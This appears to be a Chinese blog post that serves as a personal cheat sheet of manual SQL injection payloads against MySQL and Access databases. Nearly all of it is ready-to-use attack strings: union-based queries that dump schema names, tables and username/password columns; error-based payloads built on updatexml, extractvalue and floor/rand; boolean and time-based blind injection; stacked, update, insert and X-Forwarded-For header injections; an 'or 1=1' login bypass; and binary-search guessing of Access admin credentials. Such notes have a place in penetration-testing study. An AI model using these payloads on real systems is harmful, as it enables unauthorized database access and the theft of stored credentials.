SQL注入式攻击 手工语句笔记

========MySQL数据库

SQL查询语句

- 获取数据库信息
    select user(),version(),database(),@@datadir,@@version_compile_os

- 获取数据库名字
    select schema_name from schemata;
    select schema_name from information_schema.schemata;
    select group_concat(distinct table_schema) from tables;
    select group_concat(distinct table_schema) from information_schema.tables;

- 获取数据库表名字
    select group_concat(distinct table_name) from information_schema.tables where table_schema='mysql';
    select group_concat(distinct table_name) from information_schema.tables where table_schema=database();

- 获取字段名
    select group_concat(distinct column_name) from information_schema.columns where table_schema='mysql' and table_name='user';

- 获取字段内容
    select concat(0x3a,user,0x3a,password,0x3a) from mysql.user;

联合查询注入

判断注入(略)、判断字段(列)数
    union select 
    order by
查看回显位
    union select 1,2,3,4,……

获取数据库信息,假设回显位为1,2
    union select version(),user(),3%23

获取数据库名字
    union select null,schema_name,null from information_schema.schemata%23
    union select 1,schema_name,3 from information_schema.schemata%23
    union select null,group_concat(schema_name),null from information_schema.schemata%23

获取数据库表
    union select null,group_concat(table_name),null from information_schema.tables%23//获取所有数据库表
    union select null,group_concat(table_name),null from information_schema.tables where table_schema='zaqtest'%23//获取指定的数据库zaqtest的表
    union select null,group_concat(table_name),null from information_schema.tables where table_schema=database()%23//获取当前web系统的数据库的表

获取users字段字段名
    union select null,group_concat(column_name),null from information_schema.columns where table_schema=database() and table_name='users'%23

获取字段内容
    union select null,concat(0x3a,username,0x3a,password,0x3a),null from zaqtest.users%23

报错注入

and (updatexml(1,concat(0x7e,(select user()),0x7e),1))
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
and exp(~(select * from(select user())a))
(!(select * from (select user())x) - ~0)

布尔盲注

and if(mid(user(),1,1),1,0)
and if(mid(user(),1,1)='r',1,0)
and (select user() like 'r%' from tables limit 0,1)

时间盲注

and if(1=1,sleep(3),1)

堆叠查询

okmmk';update Zaq_member set email=(select user()) WHERE username='okmmk';

update注入

update Zaq_member set email='',email=(select user())#' where username = 'okmmk'
update Zaq_member set email='',email=(select user()) where username = 'okmmk' 1#' where username = 'okmmk' 

insert 注入

insert into test(username,password) values('1' and (updatexml(1,concat(0x7e,user(),0x7e),1))and '','234');

http头注入

在HTTP头中这几个是常见存在注入点的地方:
    X-Forwarded-For
    Host
    User-agent
    Referer

    X-Forwarded-For:1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and 'A
    insert into Zaq_log(ip,url,referer,ua)values('1'and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) and '','http://127.0.0.1/web_sql/http-sql/index.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0')

万能密码

or 1=1    

========ACCESS数据库

1.报错信息:

and exists(select * from MSysAccessObiects)

and (select count(*) from sysobjects)>0
and (select count(*) from msysobjects)>0

2.猜表:

and exists(select * from tables) #返回正常说明表存在!

3.猜字段和字段内容

(1)猜字段数

order by 5
union select 1,2,3,4...

接着猜字段数: order by 3
假设猜到字段数是3 然后查看回显位: union select 1,2,3

(2)猜字段名

先猜字段名: 
    and exists(select username from admin) #返回正常表示 username 存在
    and exists(select password from admin) #返回正常表示 password 存在
二分法猜字段长度和内容:
    猜长度:
        and (select top 1 len(username) from admin)>30    //error
        and (select top 1 len(username) from admin)<30    //True,接着二分法
    猜内容:
        and (select top 1 ascii(mid(username,1,1))>97 from admin)    //true
        and (select top 1 ascii(mid(username,1,1))>114 from admin)    //error    
        证明admin表的第一个记录的username字段的第一个字母的ASCII码

  • 笔记记录,仅供参考! (^ * ^)
-------------本文结束感谢您的阅读-------------
帮助别人,快乐自己,打赏随意!